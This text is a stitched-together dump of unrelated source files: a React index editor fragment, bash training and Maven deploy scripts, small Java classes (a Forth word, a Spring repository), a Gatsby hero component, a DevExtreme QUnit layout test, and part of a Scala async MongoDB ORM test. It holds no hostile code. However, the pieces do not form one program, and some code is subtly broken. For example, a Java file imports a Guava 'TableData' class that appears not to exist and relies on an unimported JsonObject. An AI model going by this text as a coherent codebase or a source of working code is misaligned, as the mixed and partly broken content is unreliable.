docLink={app.helpers.getDocUrl('DOC_URL_DESIGN_DOCS')} />
<div className="control-group">
<label htmlFor="search-name">Index name</label>
<input type="text" id="search-name" value={this.props.searchIndexName} onChange={this.updateSearchIndexName} />
</div>
<GeneralComponents.CodeEditorPanel
id={'search-function'}
className="ace-editor-section"
ref={node => this.searchIndexEditor = node}
title={"Search index function"}
allowZenMode={false}
docLink={app.helpers.getDocUrl('SEARCH_INDEXES')}
defaultCode={this.props.searchIndexFunction}
blur={this.props.blur} />
<Analyzer ref={node => this.analyzer = node} {...this.props}/>
<div className="control-group">
<button id="save-index" className="btn btn-primary save" onClick={this.saveIndex}>
<i className="icon fonticon-ok-circled" />{btnLabel}
</button>
<a href={this.getCancelLink()} className="index-cancel-link">Cancel</a>
</div>
</form>
);
}
}
|
#!/usr/bin/env bash
# Resume (--reload) dl4mt NMT training on a single GPU with the given
# config, writing logs to ./log and checkpoints to ./save/.
export CUDA_VISIBLE_DEVICES=0
echo "Using GPU $CUDA_VISIBLE_DEVICES..."
python ../train.py \
--model_name "dl4mt" \
--reload \
--config_path "../configs/dl4mt_config.yaml" \
--log_path "./log" \
--saveto "./save/" \
--use_gpu
#!/bin/bash
# Publish every version 0.0.0 .. 2.9.9, then 3.0.0, via ./deploy.sh.
for MAJOR in {0..2}
do
for MINOR in {0..9}
do
for PATCH in {0..9}
do
./deploy.sh ${MAJOR}.${MINOR}.${PATCH}
done
done
done
./deploy.sh 3.0.0
# On first execution, it is necessary to fix the maven-metadata.xml file
# FIX: abort if the repo directory is missing; previously a failed `cd`
# let the destructive mv/ln commands below run in the wrong directory.
cd ../repo/test/x || exit 1
NORM="maven-metadata.xml"
LOCAL="maven-metadata-local.xml"
# Only rewrite once: afterwards the -local files are symlinks already.
if [ ! -L $LOCAL ]; then
echo "Fixing Maven metadata file"
mv ${LOCAL} ${NORM}
ln -s ${NORM} ${LOCAL}
mv ${LOCAL}.md5 ${NORM}.md5
ln -s ${NORM}.md5 ${LOCAL}.md5
mv ${LOCAL}.sha1 ${NORM}.sha1
ln -s ${NORM}.sha1 ${LOCAL}.sha1
fi
|
<gh_stars>0
package com.testforth.words;
import com.testforth.Forth;
/**
* @author Dmitry
*/
/**
 * Base class for all Forth words (dictionary entries).
 *
 * @author Dmitry
 */
public abstract class AbstractWord {

    /** Dictionary name of this word; {@code null} for anonymous words. */
    private final String name;

    /** Creates an anonymous (unnamed) word. */
    public AbstractWord() {
        this(null);
    }

    /** Creates a word registered under the given dictionary name. */
    public AbstractWord(String name) {
        this.name = name;
    }

    /** Executes this word against the supplied interpreter instance. */
    public abstract void execute(Forth forth);

    /** Returns the word's name, or {@code null} if anonymous. */
    public String getName() {
        return name;
    }
}
|
import com.google.common.collect.ImmutableMap;
import com.google.common.collect.TableData;
import java.util.HashMap;
import java.util.LinkedHashMap;
import java.util.Map;
// Small helpers for merging JSON-backed maps and packaging table data.
public class DataProcessor {
// Merges the two objects' maps; entries from `values1` win on key collisions.
// NOTE(review): the returned map is an ImmutableMap, so callers must not
// mutate it despite the plain Map return type. `JsonObject` has no visible
// import in this file - confirm it resolves elsewhere.
private Map<String, Object> merge(JsonObject values, JsonObject values1) {
LinkedHashMap<String, Object> hashMap = new LinkedHashMap<>(values.getMap());
hashMap.putAll(values1.getMap());
return ImmutableMap.copyOf(hashMap);
}
// Wraps the given dependency map under the fixed "dependencies" key.
public static Map<String, Map<TableData, TableData>> toTableToTableDependenciesDataMap(Map<TableData, TableData> dataMap) {
final Map<String, Map<TableData, TableData>> map = new HashMap<>();
map.put("dependencies", dataMap);
return map;
}
}
package com.ssafy.sub.repo;
import java.util.List;
import org.springframework.data.jpa.repository.JpaRepository;
import org.springframework.stereotype.Repository;
import com.ssafy.sub.dto.Contest;
// Spring Data repository for Contest entities.
@Repository
public interface ContestRepository extends JpaRepository<Contest, Long> {
// Most recently created contest (highest id).
Contest findFirstByOrderByIdDesc();
// All contests, newest first.
List<Contest> findAllByOrderByIdDesc();
// NOTE(review): the repository ID type is Long but this finder takes int and
// shadows CrudRepository#findById(Long) (which returns Optional) - confirm
// the entity's id type and consider aligning them.
Contest findById(int cid);
}
|
#!/bin/bash -x
# Clean rebuild with profiling enabled, then run fx-exe with cost-centre
# stack tracing (+RTS -xc prints the stack on uncaught exceptions).
stack clean && stack build --profile && stack exec -- fx-exe trade-practice +RTS -xc
|
import React from "react"
import Image from "gatsby-image"
// FIX: merged the two duplicate `from "gatsby"` import statements into one.
import { Link, graphql, useStaticQuery } from "gatsby"
import SocialLinks from "../constants/socialLinks"
// Static query for the hero illustration (processed by gatsby-image-sharp).
const query = graphql`
  {
    file(relativePath: { eq: "macska-2.png" }) {
      childImageSharp {
        fluid {
          ...GatsbyImageSharpFluid
        }
      }
    }
  }
`
// Landing-page hero: intro text (Hungarian children's story), a link to the
// blog, social links and the fluid hero image from the query above.
const Hero = () => {
  const {
    file: {
      childImageSharp: { fluid },
    },
  } = useStaticQuery(query)
  return (
    <header className="hero">
      <div className="section-center hero-center">
        <article className="hero-info">
          <div>
            <div className="underline"></div>
            <h2>A Királylány és a Cicája</h2>
            <h4>Szerepjátékos mese gyerekeknek</h4>
            <h5><i>Hol volt, hol nem volt.<br></br><br></br>
            Volt egyszer egy nagyon kedves kiscica,
            <br></br><br></br>
            - a Királylány cicája -<br></br><br></br>
            akinek kedvenc időtöltése;<br></br> a palota felfedezése volt.
            <br></br><br></br>
            Ezen kívül szeretett még;<br></br> pihe puha párnáján pihengetni <br></br>
            és az ablakpárkányon nézelődni.
            </i></h5>
            <Link to="/blog" className="btn">
              Történt egyszer hát...
            </Link>
            <SocialLinks />
          </div>
        </article>
        <Image fluid={fluid} className="hero-img" />
      </div>
    </header>
  )
}
export default Hero
|
// Test-harness prelude for DevExtreme knockout fieldset markup tests:
// pulls in jQuery/knockout, utility modules and the full widget bundle,
// then defines the CSS selectors the assertions use.
var $ = require("jquery"),
ko = require("knockout"),
browser = require("core/utils/browser"),
devices = require("core/devices"),
themes = require("ui/themes");
require("../../../helpers/executeAsyncMock.js");
require("integration/knockout");
require("bundles/modules/parts/widgets-all");
// Field label / value cell selectors shared by the tests below.
var LABEL = ".dx-field-label",
VALUE = ".dx-field-value";
var fieldsetFixtureTemplate = ' <div id="markup" style="width: 980px"> \
<div class="dx-fieldset" id="widgetsOnFields"> \
<div class="dx-field" id="switchOnField"> \
<div class="dx-field-label" data-bind="text: \'Switch:\'"></div> \
<div class="dx-field-value" data-bind="dxSwitch: {}"></div> \
</div> \
<div class="dx-field" id="checkboxOnField"> \
<div class="dx-field-label" data-bind="text: \'CheckBox:\'"></div> \
<div class="dx-field-value" data-bind="dxCheckBox: {}"></div> \
</div> \
<div class="dx-field" id="textboxOnField"> \
<div class="dx-field-label" data-bind="text: \'TextBox: \'"></div> \
<div class="dx-field-value" data-bind="dxTextBox: {}"></div> \
</div> \
<div class="dx-field" id="autocompleteOnField"> \
<div class="dx-field-label" data-bind="text: \'Autocomplete: \'"></div> \
<div class="dx-field-value" data-bind="dxAutocomplete: {}"></div> \
</div> \
<div class="dx-field" id="textareaOnField"> \
<div class="dx-field-label" data-bind="text: \'TextArea: \'"></div> \
<div class="dx-field-value" data-bind="dxTextArea: {}"></div> \
</div> \
<div class="dx-field" id="lookupOnField"> \
<div class="dx-field-label" data-bind="text: \'Lookup: \'"></div> \
<div class="dx-field-value" data-bind="dxLookup: {}"></div> \
</div> \
<div class="dx-field" id="sliderOnField"> \
<div class="dx-field-label" data-bind="text: \'Slider: \'"></div> \
<div class="dx-field-value" data-bind="dxSlider: {}"></div> \
</div> \
<div class="dx-field" id="dateboxOnField"> \
<div class="dx-field-label" data-bind="text: \'DateBox: \'"></div> \
<div class="dx-field-value" data-bind="dxDateBox: { useCalendar: false }"></div> \
</div> \
<div class="dx-field" id="numberboxOnField"> \
<div class="dx-field-label" data-bind="text: \'dxNumberBox: \'"></div> \
<div class="dx-field-value" data-bind="dxNumberBox: {}"></div> \
</div> \
<div class="dx-field" id="simpleTextOnField"> \
<div class="dx-field-label" data-bind="text: \'Simple text: \'"></div> \
<div class="dx-field-value dx-field-value-static" data-bind="text: \'Simple text\'"></div> \
</div> \
</div> \
<div class="dx-fieldset" id="widgetsInFields"> \
<div class="dx-field" id="switchInField"> \
<div class="dx-field-label" data-bind="text: \'Switch:\'"></div> \
<div class="dx-field-value"> \
<div data-bind="dxSwitch: {}"></div> \
</div> \
</div> \
<div class="dx-field" id="checkboxInField"> \
<div class="dx-field-label" data-bind="text: \'CheckBox:\'"></div> \
<div class="dx-field-value"> \
<div data-bind="dxCheckBox: {}"></div> \
</div> \
</div> \
<div class="dx-field" id="textboxInField"> \
<div class="dx-field-label" data-bind="text: \'TextBox: \'"></div> \
<div class="dx-field-value"> \
<div data-bind="dxTextBox: {}"></div> \
</div> \
</div> \
<div class="dx-field" id="autocompleteInField"> \
<div class="dx-field-label" data-bind="text: \'Autocomplete: \'"></div> \
<div class="dx-field-value"> \
<div data-bind="dxAutocomplete: {}"></div> \
</div> \
</div> \
<div class="dx-field" id="textareaInField"> \
<div class="dx-field-label" data-bind="text: \'TextArea: \'"></div> \
<div class="dx-field-value"> \
<div data-bind="dxTextArea: {}"></div> \
</div> \
</div> \
<div class="dx-field" id="lookupInField"> \
<div class="dx-field-label" data-bind="text: \'Lookup: \'"></div> \
<div class="dx-field-value"> \
<div data-bind="dxLookup: {}"></div> \
</div> \
</div> \
<div class="dx-field" id="sliderInField"> \
<div class="dx-field-label" data-bind="text: \'Slider: \'"></div> \
<div class="dx-field-value"> \
<div data-bind="dxSlider: {}"></div> \
</div> \
</div> \
<div class="dx-field" id="dateboxInField"> \
<div class="dx-field-label" data-bind="text: \'DateBox: \'"></div> \
<div class="dx-field-value"> \
<div data-bind="dxDateBox: { useCalendar: false }"></div> \
</div> \
</div> \
<div class="dx-field" id="numberboxInField"> \
<div class="dx-field-label" data-bind="text: \'dxNumberBox: \'"></div> \
<div class="dx-field-value"> \
<div data-bind="dxNumberBox: {}"></div> \
</div> \
</div> \
<div class="dx-field" id="simpleTextInField"> \
<div class="dx-field-label" data-bind="text: \'Simple text: \'"></div> \
<div class="dx-field-value dx-field-value-static"> \
Simple text \
</div> \
</div> \
</div> \
</div>';
var checkThatTestingIsPossible = function() {
    // Registers a single always-passing placeholder test (so the QUnit module
    // is not empty) and tells the caller to skip the real layout tests.
    var skipSuite = function(message) {
        QUnit.test(message, function(assert) {
            assert.ok(true);
        });
        return false;
    };

    if(browser.mozilla) {
        return skipSuite("Temporarily we do not test for firefox");
    }

    if(!browser.webkit) {
        return skipSuite("Temporarily we do not test for non-webkit browsers");
    }

    var platform = devices.real().platform;
    if(platform === "android" || platform === "ios") {
        return skipSuite("Temporarily we do not test on mobile devices");
    }

    return true;
};
// Default knobs for the theme-specific markup suites; the exported module
// function merges caller-supplied options over these.
var defaultOptions = {
    numberBoxAlign: "right",  // which edge ("right"/"left") numberbox alignment is asserted on
    testVerticalOffset: true, // compare label/editor top offsets
    testSwitchBaseline: true, // run the dxSwitch baseline tests
    testDateBox: true         // include datebox horizontal-align assertions
};
var getFullOffsetLeft = function($element) {
    // Left edge of the element's content box: page offset plus left padding
    // and left border, rounded to whole pixels.
    var leftEdge = $element.offset().left;
    var leftPadding = parseFloat($element.css("padding-left"));
    var leftBorder = parseFloat($element.css("border-left-width"));
    return Math.round(leftEdge + leftPadding + leftBorder);
};
var getFullOffsetRight = function($element) {
    // Right edge of the element (content + padding), rounded to whole pixels.
    var rightEdge = $element.innerWidth() + $element.offset().left;
    return Math.round(rightEdge);
};
var testVerticalAlign = function($parent, inputSelector, isContainer, testVerticalOffsetFlag) {
    // Compares the field label against the editor input: optionally by top
    // offset, and always by text baseline.
    var $label = $parent.find(LABEL);
    var $value = $parent.find(inputSelector);

    if(testVerticalOffsetFlag) {
        testVerticalOffset($label, $value);
    }

    // When the selector already points at the widget container use it as-is;
    // otherwise the input's parent is the container to baseline against.
    testBaselineOffset($label, isContainer ? $value : $value.parent());
};
var testVerticalOffset = function($label, $value) {
    // Asserts that the label and the editor start at the same vertical position
    // (top offset minus top margin, with a border correction on IE9).
    // IE9 detection: document.all exists but window.atob does not.
    var isIE9 = document.all && !document.atob;
    // FIX: the original wrote `x - isIE9 ? parseInt(...) : 0`, which -- because
    // `-` binds tighter than `?:` -- evaluated as `(x - isIE9) ? parseInt(...) : 0`,
    // so the IE9 border correction was never actually subtracted. Parenthesize
    // the ternary so the correction term is computed first.
    var labelOffset = Math.round($label.offset().top - parseInt($label.css("margin-top")) - (isIE9 ? parseInt($label.css("borderTopWidth")) : 0)),
        valueOffset = Math.round($value.offset().top - parseInt($value.css("margin-top")) - (isIE9 ? parseInt($value.css("borderTopWidth")) : 0));
    QUnit.assert.equal(labelOffset, valueOffset, "Top offset equal");
};
var testBaselineOffset = function($labelContainer, $valueContainer) {
    // Compares text baselines by inserting a 1x1 <img> into each container and
    // checking the two images end up at (almost) the same vertical position.
    var $imgForLabel,
        $imgForInput;
    try {
        $imgForLabel = $("<img/>").height(1).width(1).appendTo($labelContainer);
        $imgForInput = $("<img/>").height(1).width(1).appendTo($valueContainer);
        $imgForLabel.closest(".dx-field-label").css("whiteSpace", "nowrap");
        $imgForInput.closest(".dx-field-value").css("whiteSpace", "nowrap");
        QUnit.assert.roughEqual($imgForLabel.offset().top, $imgForInput.offset().top, 0.99);
    } finally {
        // FIX: if the first appendTo throws, $imgForInput is still undefined
        // and the unconditional .remove() raised a TypeError that masked the
        // original error. Guard both removals.
        if($imgForLabel) {
            $imgForLabel.remove();
        }
        if($imgForInput) {
            $imgForInput.remove();
        }
    }
};
module.exports = function(themeName, options) {
if(!checkThatTestingIsPossible()) {
return;
}
options = options || {};
options = $.extend({}, defaultOptions, options);
var runTestModule = function(themeName) {
QUnit.module(themeName, {
beforeEach: function() {
DevExpress.testing.executeAsyncMock.setup();
$("#qunit-fixture").html(fieldsetFixtureTemplate);
var $markup = $("#markup");
ko.applyBindings({}, $markup.get(0));
},
afterEach: function() {
$("#qunit-fixture").empty();
DevExpress.testing.executeAsyncMock.teardown();
}
});
QUnit.test("Horizontal align for same widgets on and in field-value", function(assert) {
var offsetRightForSwitchOnField = getFullOffsetRight($("#switchOnField " + VALUE + " .dx-switch-wrapper")),
offsetRightForSwitchInField = getFullOffsetRight($("#switchInField " + VALUE + " .dx-switch-wrapper")),
offsetRightForCheckboxOnField = getFullOffsetRight($("#checkboxOnField " + VALUE + " .dx-checkbox-icon")),
offsetRightForCheckboxInField = getFullOffsetRight($("#checkboxInField " + VALUE + " .dx-checkbox-icon")),
offsetLeftForSliderOnField = getFullOffsetLeft($("#sliderOnField " + VALUE + " .dx-slider-wrapper")),
offsetLeftForSliderInField = getFullOffsetLeft($("#sliderInField " + VALUE + " .dx-slider-wrapper")),
offsetLeftForTextBoxOnField = getFullOffsetLeft($("#textboxOnField " + VALUE + " input")),
offsetLeftForTextBoxInField = getFullOffsetLeft($("#textboxInField " + VALUE + " input")),
offsetLeftForAutocompleteOnField = getFullOffsetLeft($("#autocompleteOnField " + VALUE + " input.dx-texteditor-input")),
offsetLeftForAutocompleteInField = getFullOffsetLeft($("#autocompleteInField " + VALUE + " input.dx-texteditor-input")),
offsetLeftForDateBoxOnField = getFullOffsetLeft($("#dateboxOnField " + VALUE + " input")),
offsetLeftForDateBoxInField = getFullOffsetLeft($("#dateboxInField " + VALUE + " input")),
offsetLeftForTextAreaOnField = getFullOffsetLeft($("#textareaOnField " + VALUE + " textarea")),
offsetLeftForTextAreaInField = getFullOffsetLeft($("#textareaInField " + VALUE + " textarea")),
offsetLeftForLookupOnField = getFullOffsetLeft($("#lookupOnField " + VALUE + " .dx-lookup-field")),
offsetLeftForLookupInField = getFullOffsetLeft($("#lookupInField " + VALUE + " .dx-lookup-field")),
offsetLeftForSimpleOnField = getFullOffsetLeft($("#simpleTextOnField " + VALUE)),
offsetLeftForSimpleInField = getFullOffsetLeft($("#simpleTextInField " + VALUE)),
offsetRightForNumberBoxOnField = getFullOffsetRight($("#numberboxOnField " + VALUE + " input")),
offsetRightForNumberBoxInField = getFullOffsetRight($("#numberboxInField " + VALUE + " input")),
offsetLeftForNumberBoxOnField = getFullOffsetLeft($("#numberboxOnField " + VALUE + " input")),
offsetLeftForNumberBoxInField = getFullOffsetLeft($("#numberboxInField " + VALUE + " input"));
assert.equal(offsetRightForSwitchOnField, offsetRightForSwitchInField, "Horizontal align for switches");
assert.equal(offsetRightForCheckboxOnField, offsetRightForCheckboxInField, "Horizontal align for checkboxes");
assert.equal(offsetLeftForSliderOnField, offsetLeftForSliderInField, "Horizontal align for sliders");
assert.equal(offsetLeftForTextBoxOnField, offsetLeftForTextBoxInField, "Horizontal align for textboxes");
assert.equal(offsetLeftForAutocompleteOnField, offsetLeftForAutocompleteInField, "Horizontal align for autocompletes");
if(options.testDateBox) {
assert.equal(offsetLeftForDateBoxOnField, offsetLeftForDateBoxInField, "Horizontal align for dateboxes");
}
assert.equal(offsetLeftForTextAreaOnField, offsetLeftForTextAreaInField, "Horizontal align for textareas");
assert.equal(offsetLeftForLookupOnField, offsetLeftForLookupInField, "Horizontal align for lookups");
assert.equal(offsetLeftForSimpleOnField, offsetLeftForSimpleInField, "Horizontal align for simples");
if(options.numberBoxAlign === "right") {
assert.equal(offsetRightForNumberBoxOnField, offsetRightForNumberBoxInField, "Horizontal align for numberboxes");
} else if(options.numberBoxAlign === "left") {
assert.equal(offsetLeftForNumberBoxOnField, offsetLeftForNumberBoxInField, "Horizontal align for numberboxes");
}
});
QUnit.test("Horizontal align for different widgets on field-value", function(assert) {
var offsetLeftForTextBoxOnField = getFullOffsetLeft($("#textboxOnField " + VALUE + " input")),
offsetLeftForAutocompleteOnField = getFullOffsetLeft($("#autocompleteOnField " + VALUE + " input.dx-texteditor-input")),
offsetLeftForDateBoxOnField = getFullOffsetLeft($("#dateboxOnField " + VALUE + " input.dx-texteditor-input")),
offsetLeftForTextAreaOnField = getFullOffsetLeft($("#textareaOnField " + VALUE + " textarea")),
offsetLeftForLookupOnField = getFullOffsetLeft($("#lookupOnField " + VALUE + " .dx-lookup-field")),
offsetLeftForSimpleOnField = getFullOffsetLeft($("#simpleTextOnField " + VALUE)),
currentTheme = themes.current(),
paddingTextAreaDifference = currentTheme === "ios.default" || currentTheme === "ios7.default" ? 3 : 0;
assert.equal(offsetLeftForTextBoxOnField, offsetLeftForAutocompleteOnField, "Horizontal align for textbox and autocomplete");
if(options.testDateBox) {
assert.equal(offsetLeftForAutocompleteOnField, offsetLeftForDateBoxOnField, "Horizontal align for autocomplete and datebox");
} else {
offsetLeftForDateBoxOnField = offsetLeftForAutocompleteOnField;
}
assert.equal(offsetLeftForDateBoxOnField, offsetLeftForTextAreaOnField + paddingTextAreaDifference, "Horizontal align for datebox and textarea");
assert.equal(offsetLeftForTextAreaOnField + paddingTextAreaDifference, offsetLeftForLookupOnField, "Horizontal align for textarea and lookup");
assert.equal(offsetLeftForLookupOnField, offsetLeftForSimpleOnField, "Horizontal align for lookup and simpletext");
});
QUnit.test("Equal width for same widgets on and in field-value", function(assert) {
var widthForSwitchOnField = $("#switchOnField " + VALUE + " .dx-switch-wrapper").width(),
widthForSwitchInField = $("#switchInField " + VALUE + " .dx-switch-wrapper").width(),
widthForCheckboxOnField = $("#checkboxOnField " + VALUE + " .dx-checkbox-icon").width(),
widthForCheckboxInField = $("#checkboxInField " + VALUE + " .dx-checkbox-icon").width(),
widthForSliderOnField = $("#sliderOnField " + VALUE + " .dx-slider-wrapper").width(),
widthForSliderInField = $("#sliderInField " + VALUE + " .dx-slider-wrapper").width(),
widthForTextBoxOnField = $("#textboxOnField " + VALUE + " input").width(),
widthForTextBoxInField = $("#textboxInField " + VALUE + " input").width(),
widthForAutocompleteOnField = $("#autocompleteOnField " + VALUE + " input.dx-texteditor-input").width(),
widthForAutocompleteInField = $("#autocompleteInField " + VALUE + " input.dx-texteditor-input").width(),
widthForDateBoxOnField = $("#dateboxOnField " + VALUE + " input.dx-texteditor-input").width(),
widthForDateBoxInField = $("#dateboxInField " + VALUE + " input.dx-texteditor-input").width(),
widthForTextAreaOnField = $("#textareaOnField " + VALUE + " textarea").width(),
widthForTextAreaInField = $("#textareaInField " + VALUE + " textarea").width(),
widthForLookupOnField = $("#lookupOnField " + VALUE + " .dx-lookup-field").width(),
widthForLookupInField = $("#lookupInField " + VALUE + " .dx-lookup-field").width(),
widthForSimpleOnField = $("#simpleTextOnField " + VALUE).width(),
widthForSimpleInField = $("#simpleTextInField " + VALUE).width(),
widthForNumberBoxOnField = $("#numberboxOnField " + VALUE + " input").width(),
widthForNumberBoxInField = $("#numberboxInField " + VALUE + " input").width();
assert.equal(widthForSwitchOnField, widthForSwitchInField, "Width for switches");
assert.equal(widthForCheckboxOnField, widthForCheckboxInField, "Width for checkboxes");
assert.equal(widthForSliderOnField, widthForSliderInField, "Width for sliders");
assert.equal(widthForTextBoxOnField, widthForTextBoxInField, "Width for textboxes");
assert.equal(widthForAutocompleteOnField, widthForAutocompleteInField, "Width for autocompletes");
assert.equal(widthForDateBoxOnField, widthForDateBoxInField, "Width for dateboxes");
assert.equal(widthForTextAreaOnField, widthForTextAreaInField, "Width for textarea");
assert.equal(widthForLookupOnField, widthForLookupInField, "Width for lookups");
assert.equal(widthForSimpleOnField, widthForSimpleInField, "Width for simples");
assert.equal(widthForNumberBoxOnField, widthForNumberBoxInField, "Width for numberboxes");
});
QUnit.test("dxSwitch on Field", function(assert) {
if(options.testSwitchBaseline) {
testBaselineOffset($("#switchOnField " + LABEL), $("#switchOnField").find(VALUE + " .dx-switch-off"), true);
} else {
assert.ok(true);
}
});
QUnit.test("dxSwitch in Field", function(assert) {
if(options.testSwitchBaseline) {
testBaselineOffset($("#switchInField " + LABEL), $("#switchInField").find(VALUE + " .dx-switch-off"), true);
} else {
assert.ok(true);
}
});
QUnit.test("dxTextbox on Field", function(assert) {
testVerticalAlign($("#textboxOnField"), VALUE + " input", false, options.testVerticalOffset);
});
QUnit.test("dxTextbox in Field", function(assert) {
testVerticalAlign($("#textboxInField"), VALUE + " input", false, options.testVerticalOffset);
});
QUnit.test("dxAutocomplete on Field", function(assert) {
testVerticalAlign($("#autocompleteOnField"), VALUE + " input.dx-texteditor-input", false, options.testVerticalOffset);
});
QUnit.test("dxAutocomplete in Field", function(assert) {
testVerticalAlign($("#autocompleteInField"), VALUE + " input.dx-texteditor-input", false, options.testVerticalOffset);
});
QUnit.test("dxLookup on Field", function(assert) {
testVerticalAlign($("#lookupOnField"), VALUE + " .dx-lookup-field", true, options.testVerticalOffset);
});
QUnit.test("dxLookup in Field", function(assert) {
testVerticalAlign($("#lookupInField"), VALUE + " .dx-lookup-field", true, options.testVerticalOffset);
});
QUnit.test("simpleText on Field", function(assert) {
testVerticalAlign($("#simpleTextOnField"), VALUE, true, options.testVerticalOffset);
});
QUnit.test("simpleText in Field", function(assert) {
testVerticalAlign($("#simpleTextInField"), VALUE, true, options.testVerticalOffset);
});
QUnit.test("dxNumberbox on Field", function(assert) {
testVerticalAlign($("#numberboxOnField"), VALUE + " input.dx-texteditor-input", false, options.testVerticalOffset);
});
QUnit.test("dxNumberbox in Field", function(assert) {
testVerticalAlign($("#numberboxInField"), VALUE + " input.dx-texteditor-input", false, options.testVerticalOffset);
});
QUnit.test("dxTextarea on Field", function(assert) {
var $parent = $("#textareaOnField"),
$label = $parent.find(LABEL),
$valueInput = $parent.find(VALUE + " textarea");
if(options.verticalOffsetTest) {
testVerticalOffset($label, $valueInput);
}
var cloneTextArea = $("<div>").css("display", "inline-block")
.css("vertical-align", "top")
.css("padding-top", $valueInput.css("padding-top"))
.css("paddingBottom", $valueInput.css("paddingBottom"))
.css("margin-top", $valueInput.css("margin-top"))
.css("marginBottom", $valueInput.css("marginBottom"))
.css("borderTopWidth", $valueInput.css("borderTopWidth"))
.css("borderBottomWidth", $valueInput.css("borderBottomWidth"))
.css("border-top-style", $valueInput.css("border-top-style"))
.css("border-bottom-style", $valueInput.css("border-bottom-style"))
.prependTo($valueInput.parent());
testBaselineOffset($label, cloneTextArea);
});
QUnit.test("dxTextarea in Field", function(assert) {
var $parent = $("#textareaInField"),
$label = $parent.find(LABEL),
$valueInput = $parent.find(VALUE + " textarea");
if(options.verticalOffsetTest) {
testVerticalOffset($label, $valueInput);
}
var cloneTextArea = $("<div>").css("display", "inline-block")
.css("vertical-align", "top")
.css("padding-top", $valueInput.css("padding-top"))
.css("paddingBottom", $valueInput.css("paddingBottom"))
.css("margin-top", $valueInput.css("margin-top"))
.css("marginBottom", $valueInput.css("marginBottom"))
.css("borderTopWidth", $valueInput.css("borderTopWidth"))
.css("borderBottomWidth", $valueInput.css("borderBottomWidth"))
.css("border-top-style", $valueInput.css("border-top-style"))
.css("border-bottom-style", $valueInput.css("border-bottom-style"))
.prependTo($valueInput.parent());
testBaselineOffset($label, cloneTextArea);
});
};
runTestModule();
};
|
<filename>rogue/core/src/test/scala/TrivialORMAsyncQueryTest.scala
package tech.scoundrel.rogue.test
import com.mongodb._
import com.mongodb.async.client
import com.mongodb.async.client._
import tech.scoundrel.rogue.MongoHelpers.{ AndCondition, MongoSelect }
import tech.scoundrel.rogue.test.TrivialORM.{ Meta, Record }
import tech.scoundrel.rogue.RogueWriteSerializer
import org.bson.Document
import org.junit.{ Before, Test }
import org.specs2.matcher.JUnitMustMatchers
import scala.concurrent.Await
import scala.concurrent.ExecutionContext.Implicits.global
import scala.concurrent.duration._
import tech.scoundrel.rogue._
import tech.scoundrel.rogue.index.UntypedMongoIndex
object TrivialAsyncORMTests {
  // Builds an async MongoClient from the `default.mongodb.server` system
  // property ("host:port"), defaulting to localhost:51101.
  def connectToMongo: client.MongoClient = {
    val (host, port) = Option(System.getProperty("default.mongodb.server")).map({ str =>
      val arr = str.split(':')
      (arr(0), arr(1).toInt)
    }).getOrElse(("localhost", 51101))
    //val opts = MongoClientOptions.builder().codecRegistry(TrivialSyncORM.codecRegistry).build()
    MongoClients.create(s"mongodb://${host}:${port}")
  }

  // Single shared client for the whole test run; created lazily on first use.
  lazy val mongoAsync: async.client.MongoClient = {
    connectToMongo
  }

  def disconnectFromMongo = {
    mongoAsync.close
  }

  type MB = Meta[_]

  // Minimal collection factory: every query maps directly to the collection
  // named by its meta object; no index metadata is provided.
  class MyDBCollectionFactory(dba: MongoDatabase) extends AsyncDBCollectionFactory[MB, Record] {
    val db = dba.withCodecRegistry(com.mongodb.MongoClient.getDefaultCodecRegistry)

    override def getDBCollection[M <: MB](query: Query[M, _, _]): MongoCollection[Document] = {
      db.getCollection(query.meta.collectionName)
    }

    override def getPrimaryDBCollection[M <: MB](query: Query[M, _, _]): MongoCollection[Document] = {
      db.getCollection(query.meta.collectionName)
    }

    override def getInstanceName[M <: MB](query: Query[M, _, _]): String = {
      db.getName
    }

    override def getIndexes[M <: MB](query: Query[M, _, _]): Option[List[UntypedMongoIndex]] = {
      None
    }

    // Record-level variants are not exercised by these tests.
    override def getPrimaryDBCollection(record: Record): MongoCollection[Document] = ???

    override def getInstanceName(record: Record): String = ???
  }

  // Test executor wired to the "testAsync" database with acknowledged writes.
  class MyQueryExecutor extends AsyncQueryExecutor[Meta[_], Record] {
    override val adapter = new MongoAsyncJavaDriverAdapter[Meta[_], Record](new MyDBCollectionFactory(mongoAsync.getDatabase("testAsync")))
    override val optimizer = new QueryOptimizer
    override val defaultWriteConcern: WriteConcern = WriteConcern.ACKNOWLEDGED

    /*
    protected def readSerializer[M <: MB, R](
      meta: M,
      select: Option[MongoSelect[M, R]]
    ): RogueReadSerializer[R]
    protected def writeSerializer(record: RB): RogueWriteSerializer[RB]
    */
    override protected def readSerializer[M <: Meta[_], R](
      meta: M,
      select: Option[MongoSelect[M, R]]
    ): RogueReadSerializer[R] = new RogueReadSerializer[R] {
      override def fromDBObject(dbo: DBObject): R = select match {
        case Some(MongoSelect(fields, transformer, true, _)) if fields.isEmpty =>
          // A MongoSelect clause exists, but has empty fields. Return null.
          // This is used for .exists(), where we just want to check the number
          // of returned results is > 0.
          transformer(null)
        case Some(MongoSelect(fields, transformer, _, _)) =>
          transformer(fields.map(f => f.valueOrDefault(Option(dbo.get(f.field.name)))))
        case None =>
          meta.fromDBObject(dbo).asInstanceOf[R]
      }

      override def fromDocument(doc: Document): R = select match {
        case Some(MongoSelect(fields, transformer, true, _)) if fields.isEmpty =>
          // A MongoSelect clause exists, but has empty fields. Return null.
          // This is used for .exists(), where we just want to check the number
          // of returned results is > 0.
          transformer(null)
        case Some(MongoSelect(fields, transformer, _, _)) =>
          transformer(fields.map(f => f.valueOrDefault(Option(doc.get(f.field.name)))))
        case None =>
          meta.fromDocument(doc).asInstanceOf[R]
      }
    }

    // Writes are not exercised through the serializer in these tests; both
    // paths are deliberately unimplemented.
    override protected def writeSerializer(record: Record): RogueWriteSerializer[Record] = new RogueWriteSerializer[Record] {
      override def toDBObject(record: Record): DBObject = {
        ???
        ///record.meta.toDBObject(record)
      }

      override def toDocument(r: Record): Document = {
        ???
        //record.meta.toDocument(r)
      }
    }
  }

  object Implicits extends Rogue {
    // Lets a Meta object be used directly wherever a Query is expected,
    // producing an unconstrained query over its collection.
    implicit def meta2Query[M <: Meta[R], R](meta: M with Meta[R]): Query[M, R, InitialState] = {
      Query[M, R, InitialState](
        meta, meta.collectionName, None, None, None, None, None, AndCondition(Nil, None, None), None, None, None
      )
    }
  }
}
// TODO(nsanch): Everything in the rogue-lift tests should move here, except for the lift-specific extensions.
class TrivialAsyncORMQueryTest extends JUnitMustMatchers {
  val executor = new TrivialAsyncORMTests.MyQueryExecutor

  // Await budget for individual queries against the local test mongod.
  val oneS = 1 second

  import TrivialAsyncORMTests.Implicits._

